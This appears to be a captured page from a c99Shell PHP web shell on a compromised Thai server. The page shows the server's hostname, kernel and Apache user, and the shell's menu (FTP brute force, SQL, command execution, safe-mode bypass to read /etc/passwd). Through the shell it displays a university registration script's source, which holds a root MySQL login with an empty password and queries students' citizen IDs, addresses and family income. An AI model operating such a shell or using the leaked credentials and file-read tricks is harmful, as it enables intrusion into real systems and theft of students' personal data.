110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/ws_standard_on_reg/ drwxr-xr-x Free 52.81 GB of 127.8 GB (41.32%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link rel="StyleSheet" href="css/style.css" TYPE="text/css">
<script type="text/javascript" language="JavaScript1.2" src="jsscript/stm31.js"></script>
<title>:-: BCNU Web Services :-:</title>
<body>
<?
$host="localhost";
$username="root";
$pass_word="";
$db="reg";
//mysql_query("SET NAMES TIS620");
mysql_connect( $host,$username,$pass_word) or die ("µФґµиНЎСє°Т№ўйНБЩЕ Mysql дБидґй ");
mysql_select_db($db) or die("аЕЧНЎ°Т№ўйНБЩЕдБидґй");
mysql_query("SET character_set_results=tis620");
mysql_query("SET character_set_client=tis620");
mysql_query("SET character_set_connection=tis620");

//$sql = "SELECT studentId, StudentMaster.studentCode , birthDate, birthProvinceId, homeAddress,    homeDistrictId,    homeAmphurId, homeProvinceId, homeZipcode, homePhoneNo, fatherName, fatherOccupation, motherName,    motherOccupation,    parentName, parentRelation, parentAddress, parentDistrictId    , parentAmphurId, parentProvinceId, parentZipcode,    parentPhoneNo,    parentMobile,    parentOcc,    parentIncome,    entryDegree FROM StudentBio, StudentMaster WHERE (StudentBio.studentId =StudentMaster.studentId)";
//$dbquery = mysql_query($sql);nationId  religionId and (StudentBio.entryDegree=Degree.degreeId)
//amphurId  amphurName   districtId  districtName  provinceId  provinceName    and (StudentMaster.studentCode='492101001')
    //$SQL = "SELECT * FROM  StudentBio, StudentMaster, Prefix, Scholar, EntryType, District , Amphur , Province , PreAdmitPosition, Nation, Religion, Degree WHERE  

    $SQL = "SELECT * FROM  StudentBio, StudentMaster, Prefix, Scholar, PreAdmitPosition, Nation, Religion WHERE  (StudentMaster.studentCode='492101001') and (StudentBio.studentId =StudentMaster.studentId)  and (StudentMaster.prefixId = Prefix.prefixId)";
    //and (StudentMaster.scholarId=Scholar.scholarId) and (Scholar.provinceId=Province.provinceId) and (StudentMaster.entryTypeId=EntryType.entryTypeId) and (StudentMaster.preAdmitPositionId=PreAdmitPosition.preAdmitPositionId) and (StudentBio.nationId=Nation.nationId) and (StudentBio.religionId=Religion.religionId)";
    $table = mysql_query($SQL) or die("дБиКТБТГ¶аГХВЎґЩўйНБЩЕг№а·аєФЕдґй");
    echo "<table border=1>";
     echo "<tr>";
     echo "<td>·Хи</td>";
    echo "<td>ГЛСК№СЎИЦЎЙТ</td>";
    echo "<td>¤У№УЛ№йТ</td>";
    echo "<td>ЄЧиН</td>";
    echo "<td>№ТБКЎШЕ</td>";
     echo "<td>аЁйТўН§·Ш№</td>";
  echo "<td>ЁС§ЛЗСґ</td>";
  echo "<td>К¶Т№РЎиН№аўйТаГХВ№</td>";
   echo "<td>»ГРаА··Ш№</td>";
 echo "<td>аЕў·ХиєСµГ»ГРЁУµСЗ»ГРЄТЄ№</td>";
 echo "<td>КСЄТµФ</td>";
   echo "<td>ИТК№Т</td>";
    echo "<td>ЗС№аЎФґ</td>";
    echo "<td>ЁС§ЛЗСґ·ХиаЎФґ</td>";
    echo "<td>·ХиНВЩи№СЎИЦЎЙТµТБАЩБФЕУа№Т</td>";
    echo "<td>µУєЕµТБАЩБФЕУа№Т</td>";
    echo "<td>НУаАНµТБАЩБФЕУа№Т</td>";
    echo "<td>ЁС§ЛЗСґµТБАЩБФЕУа№Т</td>";
    echo "<td>ГЛСКд»ГЙіХВмµТБАЩБФЕУа№Т</td>";
    echo "<td>аєНГмв·ГИСѕ·мєйТ№µТБАЩБФЕУа№Т</td>";
    echo "<td>ЄЧиН-КЎШЕєФґТ</td>";
     echo "<td>НТЄХѕєФґТ</td>";
    echo "<td>ЄЧиН-КЎШЕБТГґТ</td>";
    echo "<td>НТЄХѕБТГґТ</td>";
    echo "<td>ЄЧиН-КЎШЕјЩй»Ў¤ГН§</td>";
    echo "<td>¤ЗТБКСБѕС№ёмЎСє№СЎИЦЎЙТ</td>";
    echo "<td>·ХиНВЩијЩй»Ў¤ГН§·ХиКТБТГ¶µФґµиНдґй</td>";
    echo "<td>µУєЕјЩй»Ў¤ГН§</td>";
    echo "<td>НУаАНјЩй»Ў¤ГН§</td>";
    echo "<td>ЁС§ЛЗСґјЩй»Ў¤ГН§</td>";
    echo "<td>ГЛСКд»ГЙіХВмјЩй»Ў¤ГН§</td>";
    echo "<td>аєНГмв·ГИСѕ·мєйТ№јЩй»Ў¤ГН§    </td>";
    echo "<td>аєНГмв·ГИСѕ·мБЧН¶ЧНјЩй»Ў¤ГН§</td>";
    echo "<td>НТЄХѕјЩй»Ў¤ГН§</td>";
    echo "<td>ГТВдґйјЩй»Ў¤ГН§</td>";
    echo "<td>ЗШІФЎТГИЦЎЙТЎиН№ГСєаўйТ</td>";
    echo "</tr>";
    $num = "1";
            while($row = mysql_fetch_array($table))
            {
                    $num1++;
                    $stu_id = $row["studentId"];
                    $stu_code = $row["studentCode"];
                    $stu_prefix = $row["prefixName"];
                    $stu_name= $row["studentName"];
                    $stu_surname = $row["studentSurname"];
                    $stu_scholar = $row["scholarName"];
                    $stu_scholarprovince = $row["provinceName"];
                    $stu_positionname = $row["positionName"];
                     $stu_entryname = $row["entryTypeName"];
                    $stu_citizen = $row["citizenId"];
                    $stu_nationname = $row["nationName"];
                    /*$stu_religionname = $row["religionName"];
                    $stu_birthdate = $row["birthDate"];
                    $stu_birthprovince = $row["birthProvinceId"];
                    $stu_homeaddress = $row["homeAddress"];
                    $stu_homedistrict= $row["homeDistrictId"];
                    $stu_homeamphur = $row["homeAmphurId"];
                    $stu_homeprovince = $row["homeProvinceId"];
                    $stu_homezipcode = $row["homeZipcode"];
                    $stu_homephone = $row["homePhoneNo"];
                    $stu_fathername = $row["fatherName"];
                    $stu_fatherocc = $row["fatherOccupation"];
                    $stu_mothername = $row["motherName"];
                    $stu_motherocc = $row["motherOccupation"];
                    $stu_parentname = $row["parentName"];
                    $stu_parentrelation = $row["parentRelation"];
                    $stu_parentaddress= $row["parentAddress"];
                    $stu_parentdistrict = $row["parentDistrictId"];
                    $stu_parentamphur = $row["parentAmphurId"];
                    $stu_parentprovince = $row["parentProvinceId"];
                    $stu_parentzipcode = $row["parentZipcode"];
                    $stu_parentphone = $row["parentPhoneNo"];
                    $stu_parentmobile = $row["parentMobile"];
                    $stu_parentocc = $row["parentOcc"];
                    $stu_parentincome = $row["parentIncome"];
                    //$stu_entrydegree = $row["degreeName"];
                    */
  echo "<tr>";
  echo "<td>$stu_id</a></td>";
  echo "<td>$stu_code</td>";
  echo "<td>$stu_prefix</td>";
  echo "<td>$stu_name</td>";
  echo "<td>$stu_surname</td>";
   echo "<td>$stu_scholar</td>";
   echo "<td>$stu_scholarprovince</td>";
   echo "<td>$stu_positionname</td>";
   echo "<td>$stu_entryname</td>";
    echo "<td>$stu_citizen</td>";
     echo "<td>$stu_nationname</td>";
   echo "<td>$stu_religionname</td>";
    echo "<td>$stu_birthdate</td>";
    echo "<td>$stu_birthprovince</td>";
   echo "<td>$stu_homeaddress</td>";
      echo "<td>$stu_homedistrict</td>";
    echo "<td>$stu_homeamphur</td>";
    echo "<td>$stu_homeprovince</td>";
    echo "<td>$stu_homezipcode</td>";
    echo "<td>$stu_homephone</td>";
    echo "<td>$stu_fathername</td>";
     echo "<td>$stu_fatherocc</td>";
    echo "<td>$stu_mothername</td>";
    echo "<td>$stu_motherocc</td>";
    echo "<td>$stu_parentname</td>";
    echo "<td>$stu_parentrelation</td>";
    echo "<td>$stu_parentaddress</td>";
    echo "<td>$stu_parentdistrict</td>";
    echo "<td>$stu_parentamphur</td>";
    echo "<td>$stu_parentprovince</td>";
    echo "<td>$stu_parentzipcode</td>";
    echo "<td>$stu_parentphone</td>";
    echo "<td>$stu_parentmobile</td>";
    echo "<td>$stu_parentocc</td>";
    echo "<td>$stu_parentincome</td>";
    //echo "<td>$stu_entrydegree</td>";
    echo "</tr><br>";
     echo "</table>";
  }
    
mysql_close();

?>
</body>
</html>
:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:
:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/
:: Command execute ::
Enter:	Select: